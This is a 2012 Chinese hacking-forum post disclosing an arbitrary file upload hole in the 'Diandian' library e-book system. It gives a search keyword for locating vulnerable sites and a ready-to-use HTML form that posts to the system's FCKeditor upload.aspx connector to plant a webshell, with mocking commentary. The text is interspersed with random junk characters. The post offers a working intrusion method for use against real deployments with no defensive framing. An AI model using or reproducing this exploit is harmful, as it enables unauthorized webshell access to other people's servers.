找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 7383|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞
, d( G2 k% a. V  J! w) G6 d 作者:冰锋刺客0 s, h; {* y" R8 R1 f. f
厂商:点击书(dianjishu.com)2 z3 i2 j# [5 f9 d% |5 O# U$ ]
日期:2012-6-219 |/ I$ a1 f( r8 ~6 Z/ I

( _2 _3 D8 ?' G' s9 HI 概述# w: ?: \5 l5 F- w6 Y1 Z1 D' g
   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
5 z8 \3 L- |; K1 U II 简介
# x3 G3 j/ w- u$ i0 S5 i   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
% k! U4 a- l+ P9 C" v/ T 补充一个漏洞
9 m  V+ j7 \4 { <form id="frmUpload" enctype="multipart/form-data"
+ [" a% h7 h* F5 [  ~; R+ B action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
  L+ }& b0 j8 ~7 V3 } <input id="btnUpload" type="submit" value="操翻他">9 P" V. f2 Y2 @6 D
</form>
+ E1 \; B; g' \; j- y: Z; i. \: C 你们懂的( }+ k( M5 n$ a1 [9 N! \4 |: t1 m
那傻逼提供还需要改包.
9 l/ v$ M0 |8 }5 P2 \1 h0 l$ W9 |. x 自己看了下源代码发现fckeditor
' _5 U' y3 g9 m* i 直接秒杀
  p3 o0 N; d; s5 k! N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表